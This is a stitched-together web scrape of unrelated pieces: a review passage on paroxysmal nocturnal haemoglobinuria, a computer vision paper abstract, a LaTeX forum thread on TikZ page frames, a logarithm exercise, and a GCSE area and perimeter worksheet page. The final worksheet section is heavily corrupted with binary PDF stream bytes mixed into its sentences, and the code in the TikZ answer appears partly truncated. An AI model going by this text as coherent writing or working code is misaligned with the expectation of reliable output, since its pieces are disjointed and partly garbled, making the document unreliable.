The biochemical explanation for the absence of these proteins became clear when the GPI anchor was described as a novel mechanism of attachment of antigens to cells in 1980.14 It was subsequently shown that all the proteins absent in PNH were GPI linked and that all GPI linked antigens are missing from PNH cells. In the past decade, the structure and biochemistry of the GPI anchor have been described and there is a consistent biosynthetic abnormality in all patients with PNH described to date.15
A gene whose cDNA is able to correct this defect in all transfected human cell lines has now been cloned.16 It is situated on the short arm of the X chromosome and has been named PIG-A, a term derived from its ability to restore the GPI synthetic defect in class A murine cell lines.17 Since the gene has been cloned, mutations have been found in all patient samples reported.18
This sequence of historical milestones has taken PNH from its most obvious clinical manifestation right back to a single gene defect in a haemopoietic stem cell. The story is in one sense complete but there are still many intriguing questions to be answered.
## CLINICAL ASPECTS OF PNH
### Epidemiology
PNH is a rare disease. One of the largest epidemiological studies looked back at data from French centres from 1946 to 1995 and found only 220 reported cases.19 The annual incidence is about 4/million and the overall frequency is probably similar to that of aplastic anaemia (AA) with which it has a close association. It is probable that greater awareness and improved diagnostic methods will increase the number of diagnosed cases. The UK PNH registry in Leeds has been collecting new and existing cases since 1990 and currently has over 140 recorded patients (P Hillmen, personal observation, 2001).
### Clinical features
Patients with PNH may have a long term chronic illness but the disease does shorten life. The median survival from diagnosis was 10 to 15 years in two large historical studies.19, 20 Patients most commonly die of thrombosis or progressive cytopenias. Leukaemic transformation is uncommon (< 5%). Many patients will continue to have intermittent paroxysms of haemolysis but some eventually achieve a spontaneous remission.20 The identification of patients destined to remit is clearly an important requirement to prevent the use of toxic treatments in patients with a good prognosis.
Haemolysis is the cardinal feature. It is classically paroxysmal and most apparent in the first urine passed on waking—hence the name of the disease. In practice, patients often have a chronic haemolysis with exacerbations. This results in a variable transfusion requirement with iron deficiency often contributing to the anaemia. All patients should receive daily folic acid, because a low degree of haemolysis is usual between paroxysms. Heavily transfused patients can, paradoxically, become iron overloaded and this should be monitored to avoid compounding the problem with iron supplements.
Thrombosis is the most feared complication. There is a well established predilection for the hepatic veins but a diversity of predominantly venous sites has been described. Patients with AA and only laboratory evidence of PNH are much less likely to suffer a thrombosis than those with active haemolysis and a large proportion of PNH cells in their blood. In this last group, thrombosis may occur in up to 50% and be the cause of death in one third.19, 20
The intimate connection between AA and PNH is underlined by the clinical course of the illness in individual patients. Some degree of cytopenia is a consistent finding, even in haemolytic PNH. This may range from a mild reduction in one cell lineage to life threatening bone marrow failure. Even when blood counts are normal, bone marrow examination and progenitor culture assays reveal impaired haemopoiesis.
Malignancy, such as myelodysplasia or acute myeloid leukaemia supervenes in around 5% of cases, but is probably a result of the process leading to AA rather than a specific risk related to the PNH clone itself, which is not considered preleukaemic.21, 22
### Diagnosis
The demonstration of non-immune haemolysis with haemosiderinuria should lead to an investigation for PNH. Alternatively, its presence may be sought because of AA or a venous thrombosis at an unusual anatomical site. The diagnosis is definitively established by the demonstration of GPI linked protein deficiencies on red blood cell and neutrophil surfaces by multiparameter flow cytometry.23 The Ham test has been largely abandoned where flow cytometry is available, because it is relatively insensitive and labour intensive and only gives information on red blood cells. The solid phase gel techniques used for antibody detection in blood transfusion provide a rapid screen but again are limited to red blood cell antigens. The proportion of affected red blood cells often gives a falsely low assessment of the true clone size because of the effects of the selective haemolysis of PNH red cells compared with their normal counterparts and because of the effect of transfusion. The neutrophil series is not affected by these variables and therefore allows an accurate measurement of the clone size. It is possible to detect PNH clones that comprise < 1% of neutrophils using multiparameter flow cytometry.24 It is important to include a transmembrane antigen as a lineage marker (for example, CD15 for neutrophils) and at least two GPI linked antigens (for example, CD55 and CD59) to exclude the rare inherited deficiencies of single antigens such as the Inab phenotype (CD55 deficiency).
“It is probable that the haemolytic and thrombotic features of paroxysmal nocturnal haemoglobinuria are mediated by complement sensitivity and that CD59 deficiency is an important cause of this”
Using flow cytometry, it is possible to demonstrate patterns of complete or partial GPI linked protein deficiency on the red blood cell series. Normal cells are designated type I, partially deficient type II, and completely deficient type III (fig 1). The clinical severity of the disease is directly related to the proportion of type III red blood cells.
Figure 1
An example of peripheral blood phenotyping in paroxysmal nocturnal haemoglobinuria (PNH). Plots from a flow cytometer showing the clear discrimination between populations of normal and PNH cells in a patient's peripheral blood sample. (A,B) Plots showing the three types of red blood cells that can be detected in these patients. Type 1 cells are normal, type II are partially deficient in glycosyl phosphatidylinositol (GPI) linked proteins, and type III are wholly deficient. CD55 and CD59 are GPI linked antigens found on red blood cells. (C) Plot showing granulocytes that have been dual stained with two GPI linked surface antigens (CD16 and CD66) in a patient with PNH. This clearly delineates the normal and the PNH cells. (D) Plot using the same double staining method but with antigens relevant to monocytes (CD64 and CD14): the same clear demarcation is shown. Courtesy of Dr S Richards, Haematological Malignancy Diagnostic Service, The General Infirmary, Leeds, UK.
If these techniques are applied to other haemopoietic cell lineages, GPI deficiency can be documented on platelets, monocytes, and lymphocytes, confirming the stem cell nature of the disorder25 (fig 1).
### Treatment
This is another area much influenced by the interplay of PNH and AA. Those with AA or progressive pancytopenia may be candidates for intensive disease modifying treatment, including immunosuppression or bone marrow transplantation. These approaches are usually not appropriate for classic PNH without bone marrow failure. Interesting exceptions to this rule are disease occurring in patients with a syngeneic twin. In this circumstance, there is little risk from transplant, although it appears that at least moderate doses of conditioning chemotherapy before stem cell infusion are necessary to prevent re-expansion of the PNH clone.26
Most patients without pronounced cytopenias simply require supportive management. Blood transfusion is the mainstay for those with symptomatic anaemia. Folate supplementation is mandatory and iron status should be monitored because patients can become iron deficient through urinary loss or iron overloaded from blood. Because thrombosis is a leading cause of mortality in this group, all those with haemolytic disease or a large percentage of PNH cells in their blood (perhaps > 50% PNH neutrophils) should be considered for primary prophylaxis with warfarin if there are no contraindications.20
## THE BIOCHEMICAL AND MOLECULAR BASIS OF PNH
A failure of GPI anchor synthesis is a constant and key feature in all cases of PNH. The genetic basis of this abnormality is now well described, as is the detail of the biochemical consequences.16, 18, 27 GPI deficiency causes a loss of many proteins from the cell surface. The resulting cell phenotype explains the clinical features and suggests a mechanism for expansion of the PNH clone. These assumptions, while reasonable, await further experimental proof and the correlation of all clinical sequelae with specific protein loss has yet to be achieved. Before speculating on this, it is worth describing what we know about the GPI anchor, the missing proteins, and the underlying genetic defect.
### The GPI anchor
Most cell surface proteins are attached via a sequence of hydrophobic amino acids that spans the lipid portion of the bilayer. This transmembrane domain achieves a stable interaction, which is not easily disrupted without destroying the membrane itself. In the 1980s, another method of cellular attachment was described whereby proteins were linked to a GPI molecule, which was itself inserted into the cell membrane.28 The structure and the biosynthesis of this GPI anchor were determined from work in trypanosomes, whose major surface glycoprotein is attached by this mechanism.29 The backbone of the GPI structure is highly conserved between species.
There are essentially three parts to the GPI anchor (fig 2). The membrane attachment is achieved through the insertion of the lipid moiety of phosphatidylinositol (PI) into the outer leaflet of the membrane. There is then a glycan core consisting of a molecule of N-acetylglucosamine (GlcNAc) linked to three mannose residues and then to an ethanolamine. The protein attachment site is to the phosphoethanolamine (PEA) molecule linked to the terminal mannose. The C-terminus of the relevant protein is linked to the amino group of the PEA molecule by an amide bond.18, 30, 31
Figure 2
The glycosyl phosphatidylinositol (GPI) anchor. This is a simplified diagram of the GPI structure. The C-terminus of the anchored protein links to an ethanolamine residue on the GPI anchor. The anchor itself consists of this ethanolamine moiety attached to a glycan core. The GPI structure attaches to the cell membrane via phosphatidylinositol. The glycan core consists of a molecule of GlcNAc linked to three mannose residues. The first step in GPI synthesis is the linkage of the GlcNAc to PI. It is this reaction that fails in paroxysmal nocturnal haemoglobinuria because the genetic lesion disrupts the production of a necessary enzyme complex.
“Glycosyl phosphatidylinositol deficiency causes a loss of many proteins from the cell surface”
Biosynthesis of the GPI moiety occurs in the rough endoplasmic reticulum (ER). The precise location at which each reaction takes place is still a matter of some doubt. Some of the steps take place on the cytoplasmic surface of the ER and some within the cisternal space.32 The first step in the process is the addition of a molecule of GlcNAc to a PI residue. This does take place on the cytoplasmic surface of the ER and, at some point, the developing molecule is flipped to the cisterna. A series of three mannosylations follows using dolichol-phosphate mannose as a donor. Ethanolamine is added to each of these sugars. Transamidation of the newly synthesised protein leads to its attachment to the PEA molecule on the terminal mannose and finally the protein–GPI complex is transported to the external surface of the cell.
### The importance of GPI linkage
The high degree of interspecies conservation of the GPI structure and its wide distribution argues for an important biological role for this mechanism of protein attachment. Most available information comes from work on trypanosomes and animal studies and the relevance to humans is speculative.
Enzymes have been characterised that cleave GPI anchors, thus releasing the tethered proteins.33 These phospholipases are present in other mammals and trypanosomes and their existence suggests that some proteins may be anchored through GPI to allow their selective removal. An example of this is the deliberate cleavage of the major surface protein (variant surface glycoprotein; VSG) of the trypanosome and its replacement with an immunologically discrete variant VSG from its repertoire. This allows the organism to evade the immune response in an infected host.34
Proteins attached through GPI are less tightly bound than their transmembrane counterparts, which allows a degree of transfer from one species (or cell) to another, as has been described in the parasitic infection caused by Schistosoma mansoni. In this case, the parasite seems to acquire host CD55, which in turn helps it to avoid complement mediated immune attack.35
In addition to allowing “loss or gain” of proteins, the biochemical membrane associations and mobility are different for GPI anchors and transmembrane domains. It is possible that the anchor's characteristics and localisation are integral to the normal function of the associated protein.
GPI linked proteins are not randomly distributed over the cell membrane. In polar cells they are frequently located at the apical pole. In all cells, they associate with each other in regions of the membrane that are rich in glycolipids (sphingolipids and cholesterol), in so called glycolipid rafts. The importance of these structures remains unclear.
### The GPI abnormality in PNH
Affected cells in PNH synthesise little or no GPI anchor. This results from a failure in the first step in the synthetic process—the addition of GlcNAc to PI. This has been demonstrated using different techniques by several workers. Biochemical studies using labelled precursors show an almost complete lack of intermediates containing mannose or glucosamine, indicating that the block in the pathway is at this first stage.36 Murine cell lines incapable of synthesising GPI structures have been studied. In these experiments it could be shown that lines in which the defect occurred at different points in the pathway complemented one another (restored the synthesis when fused together). Three lines, classes A, C, and H, were individually unable to add GlcNAc to PI but when fused together they complemented one another.37, 38 This implied that there were at least three gene products controlling this step. When PNH cells from patients are fused with these lines, they always complement cells of classes C and H but never those of class A. Thus, it became clear that the defect in PNH was always the same as that found in class A cells and led to a failure in the first step in GPI synthesis.39 This led to the subsequent discovery and expression cloning of the gene involved, which was termed PIG-A (phosphatidylinositol glycan complementation class A).16 It appears that the product of PIG-A, along with at least three other gene products (PIG-C, PIG-H, and hGP1), form the enzyme complex responsible for the transfer of GlcNAc to PI (R Watanabe et al. In: Proceedings of the International Symposium on Glycosyltransferases and cellular communication, 1997, Osaka, Japan, abstract 6).
### GPI linked proteins in PNH
If no GPI molecule is produced then the unlinked proteins are degraded in the ER and are absent from the cell surface.40 Some can still be expressed in an alternative transmembrane bound form (for example, FcχRIII/CD16 or LFA-3/CD58), but whether they retain the same function is not clear.41, 42 A further complicating factor in the analysis of surface phenotype in PNH is that some patients can synthesise small quantities of GPI anchor and there appears to be competition between proteins for this residue, leading to partial expression of certain molecules and complete absence of others. This is best observed in red blood cells that are divided into three types on this basis by flow cytometry.43 Type I are normal in their surface expression, type II show reduced but detectable amounts of GPI linked proteins, and type III are completely deficient. Patients with florid haemolysis usually have a large proportion of type III cells, whereas those with non-haemolytic PNH in association with overt aplasia may have either type II cells or small type III clones.24 Type II cells probably arise in patients with PIG-A mutations that allow a small amount of residual protein to be produced—for example, some missense point mutations.44
A wide range of proteins use the GPI linkage mechanism for cell surface attachment. There is no obvious similarity between them, belonging as they do to different functional groups. They include complement defence proteins, enzymes, blood group antigens, adhesion molecules, cell receptors, and others of unknown function.27, 45 If the proteins are normally expressed on haemopoietic cell lineages then they are absent in the cells of the PNH clone. Table 1 illustrates the diversity of proteins that have been described, although it is by no means exhaustive.
Table 1
The range of glycosyl phosphatidylinositol (GPI) linked proteins
“The high degree of interspecies conservation of the glycosyl phosphatidylinositol structure and its wide distribution argues for an important biological role for this mechanism of protein attachment”
### The PIG-A gene
In 1993, Miyata et al described the expression cloning of the PIG-A gene by the correction of a GPI deficient murine cell line, which had a similar GPI biosynthetic defect to that observed in PNH.16 The PIG-A gene is somatically mutated in all cases of PNH, presumably because it is the only gene of the GPI biosynthetic pathway that is found on the X chromosome at Xp22.1.17, 49 This means that a single mutation of the gene on the active X chromosome of a haemopoietic stem cell in women or the only X chromosome in men, will result in the PNH phenotype. The PIG-A gene consists of six exons spanning 17 kb of genomic DNA. It has an open reading frame of 1452 bp encoding a protein of 484 amino acids.17, 49 There is a short 5 non-coding region with the initiation of transcription in exon 2 and a relatively large 3 non-coding region. The PIG-A promoter sequences are characteristic of a housekeeping gene, which presumably reflects the widespread expression of GPI linked proteins in all cell types.
### PIG-A mutations in PNH
Because the mutations are somatic in PNH, they are extremely varied, with very few reported more than once.39, 45, 50–63 Approximately two thirds are small insertions or deletions resulting in a frameshift and early termination of transcription. In this circumstance, no active PIG-A product is produced and the PNH cells are completely deficient in all GPI linked proteins. The remainder are point mutations and these may result in a complete or partial deficiency of GPI linked proteins. More than 100 PIG-A mutations have now been described and very few are repeated (fig 3).
Figure 3
The PIG-A gene. (A) The genomic structure of the PIG-A locus. The promoter sequences of the PIG-A gene are depicted in greater detail and consist of four CAAT boxes, two AP-2 sequences, and a CRE (cAMP response element) sequence. These features are consistent with the ubiquitous expression of PIG-A. (B) The coding region of PIG-A. The reported point mutations are depicted by the arrows: the open arrows indicate missense mutation, the solid arrows are nonsense mutations, and the hatched arrows are at the site of a polymorphism that does not affect the code and has been reported in normal individuals. Codons 48 and 128 are affected by several different point mutations, indicating that these are potentially crucial areas of the PIG-A protein. The solid bar demonstrates the region of homology between PIG-A and several other glycosyltransferases, suggesting that it may be the binding site for N-acetylglucosamine. One point mutation has been reported in this domain which resulted in a relatively neutral amino acid substitution (asparagine to aspartic acid) and a partial deficiency of glycosyl phosphatidylinositol linked antigens in this patient.
In over half of affected patients, flow cytometric analysis of the red blood cells identifies two discrete populations of PNH cells (type III, with complete deficiency; and type II, with partial deficiency of GPI linked antigens). This indicates that there are at least two unrelated PNH clones in these patients. Several groups have now described patients with more than one PNH clone at a molecular level; in fact, as many as four separate GPI deficient clones with different PIG-A mutations have been identified in a single patient.64 In most cases, the individual clones occur at the same time, but one patient was studied before and many years after a bone marrow transplant, at the time of relapse, and the PIG-A mutations at relapse were different to those of the original disease.65 In many of the cases with more than one mutated clone, red blood cell flow cytometry only identifies a single PNH population. Thus, it appears that most patients have multiple PNH clones. This indicates that patients are permissive for the development and/or expansion of PNH clones and therefore suggests a factor extrinsic to the PNH clone(s) that favours their development.
### Is a PIG-A deficient clone sufficient to result in PNH?
The PIG-A gene is essential for embryogenesis and therefore mice that have “knocked out” PIG-A genes are not viable. When PIG-A deficient embryonic stem cells are microinjected into murine blastocysts, chimaeric mice are occasionally produced but only have a small number of cells derived from the PIG-A negative embryonic stem cells.66, 67 The deficient stem cells contribute to the haemopoietic compartment of the resulting chimaeric mice but their proportion in any individual mouse remains constant with time. In addition, when mice are produced with higher proportions of GPI deficient haemopoietic cells, by using the Cre-Lox P system and/or by transplantation experiments, the proportion of GPI deficient haemopoietic cells remains constant over time.68 These findings show that PNH cells do not have a growth advantage over their normal counterparts in mice without bone marrow failure.
“The cause of the most intriguing feature of paroxysmal nocturnal haemoglobinuria clones—their relative growth advantage in a damaged bone marrow—remains obscure”
Araten and his colleagues recently reported the presence of rare GPI deficient neutrophils in normal individuals.69 These cells have a frequency of 10–51/million cells and when collected by flow sorting were shown to contain mutations of the PIG-A gene. These findings show that such mutations exist frequently among normal individuals, but this alone is not sufficient for the development of PNH.
## SUMMARY: THE DEVELOPMENT OF PNH
We may now put forward a general outline of the factors leading to PNH and of its interplay with aplasia. The dual pathogenesis model appears to withstand the rigours of both time and experimental research. In this hypothesis, somatic mutations in PIG-A lead to PNH only if the affected cells are in a bone marrow under hypoplastic stress. The mutation and the abnormal bone marrow environment are both required. PNH cells possess only a relative growth advantage and will not prosper in a normal bone marrow.
### Take home messages
• It appears that the development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene and a hypoplastic bone marrow environment
• The gene mutation results in failure of synthesis of the glycosyl phosphatidylinositol (GPI) anchor, without which many proteins are unable to attach to cell surfaces
• It is thought that these alterations in surface antigen composition give the PNH cells a relative growth advantage in a hypoplastic marrow, although the precise pathophysiological mechanisms are unclear
• The failure of GPI production results in the loss of complement defence proteins from red blood cells, which explains the classic feature of intravascular complement mediated haemolysis
• There is indirect evidence that platelet activation with consequent thrombosis is caused by a similar mechanism
If this is correct, then certain observations would be expected. Hypoplasia should be found invariably. This clinical association has of course been long recognised. Some degree of single or multiple cytopenia can be found in up to 80% of cases and in others there is laboratory evidence of diminished progenitor growth potential.20, 70 It appears then, that hypoplasia and PNH do indeed go hand in hand. For dual pathogenesis, one would require PIG-A mutations to be frequent in normal individuals; otherwise the coincidence of such an occurrence in the rare disease of aplasia would be extraordinary. This was in fact suspected from the presence of multiple, separate mutations in certain patients with PNH and has now been confirmed by observations from several authors.70, 71 So it appears that the concept of dual pathogenesis accounts for the observed facts.
The mechanism by which aplasia imparts a relative growth advantage to PNH cells is more speculative. Although few doubt the immune component in aplasia, it is unclear whether this is a primary alteration in the stem cell pool against which an immune response develops or an autoreactive state, where otherwise normal stem cells are targeted. In either scenario, the PNH cells may prosper by evading the immune destruction. This could be mediated directly by loss of a GPI linked “recognition molecule” or occur through altered biology or localisation of the cells through GPI linked mechanisms. The answers to these questions will not only enlighten PNH research but may greatly enhance our understanding of aplasia and stem cell behaviour.
|
|
# From bits to images: Inversion of local binary descriptors
### Abstract
Local Binary Descriptors (LBDs, such as BRIEF and FREAK) have become very popular for image matching tasks, especially when going mobile. While they are extensively studied in this context, their ability to carry enough information in order to infer the original image is seldom addressed. In this work, we leverage an inverse problem approach to show that it is possible to directly reconstruct the image content from LBDs. This process relies on very broad assumptions besides the knowledge of the pattern of the descriptor at hand. This generalizes previous results that required either a prior learning database or non-binarized features. Furthermore, our reconstruction scheme reveals differences in the way different LBDs capture and encode image information. Hence, the potential applications of our work are multiple, ranging from privacy issues caused by eavesdropping image keypoints streamed by mobile devices to the design of better descriptors through the visualization and the analysis of their geometric content.
Type
Publication
In Transactions on Pattern Analysis and Machine Intelligence, Volume: 36, Issue: 5, May 2014, IEEE.
Date
More detail can easily be written here using Markdown and $\rm \LaTeX$ math code.
|
|
# Margins around Tikz frame
I'm dealing with the graphic part of a document which I need to fill with text. In particular I need to have a header where to put some general information and the document text simply boxed.
Depending on the text verbosity, the document can be one page or x pages. In this last case, starting from page 2, I don't want anymore the header, but only the text boxed.
I tried to figure how to obtain the boxed text and I discovered Tikz. But I have some problems by defining the margins of the box and then the text behavior for the page after the first. The top margin seems to disappear, I don't understand why. I tried a lot of solutions, using \fbox or using \trimbox{} and \adjustebox, but I didn't find a solution yet.
Secondly, I can't make the header disappear after the first page. I tried with \clearpage and \thispagestyle{empty} but they remove margins and page numbering also.
I a MWE to show what I did until now:
\documentclass[a4paper]{article}
\usepackage[all]{background}
\usepackage{tikz}
\usetikzlibrary{calc}
\usepackage{lipsum}
\usepackage[sfdefault, light]{roboto}
\usepackage{geometry}
\geometry{left=80pt, right=80pt, top=65pt}
\usepackage[T1]{fontenc}
\usepackage[utf8]{inputenc}
\usepackage{lastpage}
\usepackage{fancyhdr}
\pagestyle{fancy}
\cfoot{\footnotesize Page \thepage\ of \pageref{LastPage}}
\chead{{\large \textsc{My Name IS}}\\ \vspace{3pt} {\small My Work IS -- My Specialisation IS}\\ My Cell. IS -- My ID IS}
\usepackage{lettrine}
\usepackage{fix-cm}
\newcommand{\Frame}{
\trimbox{10cm 10cm 10cm 5cm}{
\begin{tikzpicture}[every node/.style={inner sep=10,outer sep=10},overlay, remember picture]
\draw [line width=1mm]
($(current page.north west) + (1cm,-3cm)$)
rectangle
($(current page.south east) + (-1cm,1cm)$);
\end{tikzpicture}
}
}
\SetBgContents{\Frame}
\SetBgOpacity{100}
\SetBgColor{black}
\SetBgAngle{0}
\SetBgScale{1}
\begin{document}
\vspace*{50pt}
\lipsum[1-19]
\end{document}
Thank you for your time and help! R.
• see tcolorbox package, maybe can help you – Zarko Jul 30 '17 at 18:34
• regarding making the headers disappear, try putting \pagestyle{empty} right in the file, and after the pages with tikz content are safely finished, probably after a \newpage, add \pagestyle{headers} to restore them. (not tested.) – barbara beeton Jul 30 '17 at 19:12
• You realize the 65pt is less then 3cm. Or did you mean 1cm? – John Kormylo Jul 30 '17 at 20:47
• @Zarko thank you for your answer. I'm gonna have a look at tcolorbox and try to make it useful for my needs. @barbarabeeton thank you for your answer. I tried putting \pagestyle{empty} but after a new page the style comes back. @JohnKormylo thank you for your answer. If I understood well, you mean that the border of the top frame is lower than the other three isn't it? It's exactly what I want. – Dawson Jul 31 '17 at 7:20
I prefer to use everypage with tikzpagenodes for headers etc.
\documentclass[a4paper]{article}
\usepackage[all]{background}
\usepackage{tikzpagenodes}
\usetikzlibrary{calc}
\usepackage{lipsum}
%\usepackage[sfdefault, light]{roboto}
\usepackage{geometry}
\geometry{left=80pt, right=80pt, top=65pt}
%\usepackage[T1]{fontenc}
%\usepackage[utf8]{inputenc}
\usepackage{lastpage}
\usepackage{lettrine}
\usepackage{fix-cm}
\pagestyle{empty}
\usepackage{everypage}
\begin{tikzpicture}[every node/.style={inner sep=0pt},overlay, remember picture]
\node[above] at (current page footer area.south) {\footnotesize Page \thepage\ of \pageref{LastPage}};
\node[below] at (current page header area.north)
{\begin{tabular}{c}
{\large \textsc{My Name IS}}\\[3pt]
{\small My Work IS -- My Specialisation IS}\\
My Cell. IS -- My ID IS
\end{tabular}};
\end{tikzpicture}%
\else
\begin{tikzpicture}[overlay, remember picture]
\node[above] at (current page footer area.south) {\footnotesize Page \thepage\ of \pageref{LastPage}};
\draw [line width=1mm]
($(current page.north west) + (1cm,-1cm)$)
rectangle
($(current page.south east) + (-1cm,1cm)$);
\end{tikzpicture}%
\fi}
\begin{document}
\vspace*{50pt}
\lipsum[1-19]
\end{document}
• Dear @JohnKormylo, thank you for your answer! It works perfectly by using a if-then-else cicle. There's just a problem, which I think is related with the 65pt question you asked me before. The problem is that I want the tikz border of the first page, only the first, lower, because I need to insert My Data IS, etc.. In your excellent solution, in the first page there isn't any tikz border.. Anyway, I tried to understand the code you proposed and I find a solution by inserting the \draw code with (1cm,-3cm) even for the first page and it works! Thank you very much! R. – Dawson Jul 31 '17 at 7:28
• How to insert an image right in a comment? I would show the final result, for future needing. ibb.co/bu5wS5 – Dawson Jul 31 '17 at 7:34
|
|
## Functions Modeling Change: A Preparation for Calculus, 5th Edition
$\frac{3}{2}$
We know that $\log_ab=c\Leftrightarrow a^c=b$ and $\ln b=c\Leftrightarrow e^c=b$. Also, $\log_a a^x=x$ and $\log_a b^x=x\log_a b$ Hence here: $\log\sqrt{1000}=\log{(10^3)^{\frac{1}{2}}}=\log{10^{\frac{3}{2}}}=\frac{3}{2}\log10=\frac{3}{2}\cdot1=\frac{3}{2}$
|
|
I will be working hard over the next couple of weeks to … @ ��2�� �x�We����Q�aR�5ŧN���*H��6g\̼1�����Z�Xg��V�E� Must Practice 11 Plus (11+)Area and Perimeter Questions. 1. Search for: Contact us. endstream The Corbettmaths Practice Questions on Perimeter. ... Area and Perimeter [GCSE Questions] Area and Perimeter [Solutions] Angles in Polygons [GCSE Questions] Angles in … endobj GCSE-style questions to calculate the simple area, perimeter and volume worksheets in pdf format. TO������Or"?&�"��ܪ�| }�ج�V���H�-��ß��ʉG'�ĐO�Ϸ�F��t�&����V.aI�! Gcse Foundation Exam Questions Area And Perimeter BBC Bitesize KS3 Maths. 5-a-day Workbooks. We have produced a compendium of themed papers with student-friendly mark schemes. 8 0 obj Here is a selection of free resources to get you started. 2. {}��Yc,ҼL�������-#F��/6�aȤ���]W��pk��m삌��F�⌙_+ T���_��54d� �p�����̎ ��s�8d�e&KvC��~+�0o�wTKD����DV�/*�'ɒ�5c�,tw�S���y� �@��*����� ]^�ry����fkO@Oʺ.�����e=��NCJ$��f*�&n"����*�Yu7yC�>>>�+�?���P��� �C|�����0�ַВ[9�=�,�y�LT� ��"QG܌E�*�?��3��*\逽�qù�i�8P�I7�>��Bþb���C�q���^�֊'cѕW4�2^h�a,�k��c����O )dE�Ռk#ނ�Q+N�~AW8d�#��J�����돯�=}���� �� endobj • Check your answers seem right. <> Our area and perimeter worksheets for kids will provide all the necessary resource they need to fully embrace this mathematical skill. GCSE Area and Perimeter. Its first recorded usage was during the 15th century. arrow_back Back to Area of Quadrilaterals Area of Quadrilaterals: Worksheets with Answers. ... GCSE Revision Cards. What is volume? The total distance around the edge of one equilateral triangle is 12 cm. B. These are organised by theme and topic. <> 3 0 obj endobj D. The number of squares inside a shape. x�cdd��]�Ly�,�Y30JObԻ���p������� �����Y��� >I������#����Á��An��hg� �o�m�/�� arrow_back Back to Perimeter Perimeter: Diagnostic Questions. The area of the rectangle is six times larger than the area of the triangle. endobj 44 0 obj <> endobj Mr Barton's Quizzes 9 cm 2. What is surface area? • Answer all questions. Model answers & video solution for Circles - Area & Circumference. Instructions Use black ink or ball-point pen. Calculate the area of the shaded part. '^�'�\E���H%����@x�,����K/;@b2x��!N{,���ϼ�[R�0Β�[��I�ZV�ۯ[~�����ؖ�&5\I&I��� �H!�1 ��6���Ē� Ĵ�q���=-Y�|�~��u��S����4V+�4�����*C,�+�*��>�&A�꣓\��u�z�T|�R�hA� ��ix�X��ȯ�����L�XZ.��/�J��qH3���Y�Dࡰl�?X���&��c�����z"�Y������ R_��"d�ȑ��A[� A shop sells this striped carpet from a roll that is 3m wide at a price of £25 per 5 0 obj [1] 8) Find the area of the trapezium 7 cm 4 cm 11 cm [1] 9) The tile pattern below is made from 2 equilateral triangles. 6 0 obj These topic-based compilations of questions from past GCSE papers are supplemented by ‘new’ questions which have not yet been asked, but which could be. 2 0 obj These area perimeter and volume worksheets in pdf format are based around the home and day-to-day life for GCSE grades 1 to 3. 4 0 obj This diagram shows the outline of a pond. endobj Give your answer in its simplest form. GCSE (1 – 9) Area and Perimeter Name: _____ Instructions • Use black ink or ball-point pen. 7 cm 2. You need to know the formulas to calculate the areas of some common shapes and be able to rearrange them. Primary Study Cards. file Gcse Foundation Exam Questions Area And Perimeter Book Free Download PDF at Our eBook Library. This revision guide will provide everything you need to know about area and perimeter for GCSE maths. www.justmaths.co.uk Area & Perimeter (H) - Version 2 January 2016 Area & Perimeter (H) A collection of 9-1 Maths GCSE Sample and Specimen questions from AQA, OCR, Pearson-Edexcel and WJEC Eduqas. Along with Detailed Answers, Timing, pdf download. 1. 1. Find its width. Calculate the lengths of the missing sides. x��Xێ�6}_��O�TԴx���(��$M�M�E��A���������{����.�R,V�ɹ�̜!��UU�lS��[_�u���߲���������|�:�+Y]���ۇ�kz�g�y������k����b�\0!x�����B��3&�Z��n$��_^D�?\^�X��yyy��? %PDF-1.5 <> It's free to register here toget Gcse Foundation Exam Questions Area And Perimeter Book file PDF. endstream endobj Mr Chadburn The Only Way To Learn Mathematics Is To Do. Exam Practice Maths With Graham. Primary Practice Questions Perimeter Tips • Read each question carefully • Attempt every question. @҅��a��Y�v���F�1��E�e�sRd ë���+���������P*o�p�Y�e�~��*��c�4v�ɻ��2_Z�ub�lZ퉴�q�ر��,1�zkCi:]9/�6Ė���=*VY�� ���1�]���|�Wa�����[��-ME ��!r n�&�ցHc�W���l[2��;�����d���ǭ�$܂�sM��S endobj KS2 SATS QUESTIONS; GCSE REVISION SHEETS; ... PERIMETER AND AREA. Must Practice 11 Plus (11+) Area and Perimeter Past Paper Questions. ... pdf, 713 KB. Download free printable Perimeter and area Worksheets to practice. x��]��g|,k�f��8ǀ �8�s~���U��"���&G��T���a��Z# ������CR�~��Ҵۿӱ)�u�/݆ߩmk���n��T��Z-�ҍ�L��fs����͗n�)��lr���'q����Y�7�q�V}�f���M7�h�WJd��$U�u��f�}4����θv Area and Perimeter Problems GCSE worksheet. Area & Perimeter A collection of 9-1 Maths GCSE Sample and Specimen questions from AQA, OCR, Pearson-Edexcel and WJEC Eduqas. Each problem needs to be identified as either an area problem or a perimeter problem and then solved.. 1. www.justmaths.co.uk Area & Perimeter (H & F) - Version 1 January 2016 Area & Perimeter (H & F) A collection of 9-1 Maths GCSE Sample and Specimen questions from AQA, OCR, Pearson-Edexcel and WJEC Eduqas. The number of cubes that fit inside a shape. 1. 20. The area of all the surfaces of a 3-D shape. 4.7 3 customer reviews. 47 0 obj <>stream Calculate the exact area of the shape shown on a 1 cm square grid. Ӎ)�����j��&�uԊ��XI�S�ܯ�~�z�����u}%�of���I! Gcse Foundation Exam Questions Area And Perimeter Book everyone. The problems on the sheet are identical, but the measurements get progressively harder to do! Edexcel GCSE Mathematics (Linear) – 1MA0 AREA OF SECTOR AND LENGTH OF ARCS Materials required for examination Items included with question papers Ruler graduated in centimetres and Nil millimetres, protractor, compasses, pen, HB pencil, eraser. GCSE Exam Style Questions MathsBot Com. %���� I usually print these questions as an A5 booklet and issue them in class or give them out as a homework. I also make them available for a student who wants to do focused independent study on a topic. The Corbettmaths Practice Questions and Answers on the Area of a Parallelogram. 45 0 obj <>>> endobj 46 0 obj /P -1340/V 4/R 4/Length 128/CF<>>>/StrF/StdCF/StmF/StdCF/EncryptMetadata false>> endobj 48 0 obj <>/XObject<>>>/Contents 49 0 R/CropBox[0 0 595.2199 842]/Rotate 0>> endobj 49 0 obj <>stream Level 5 . s� �K�!ya��L��5�����{I��At2�M�SJ^��g8U7?�3A�>�s�E#) D�5ʃ�@��o��TY�̂������/�s�����?�"X Table 1 lists examples of area, perimeter and volume questions that have come up in Edexcel Functional Skills exams. �^ � �i 2. Adult Numeracy Functional Maths And GCSE Resources. Tracing paper may be used. Area and Perimeter Word Problems Sheet 1A This Area and Perimeter Questions PDF in Hindi and English will prove useful to you. ܢ�/�0fvl� 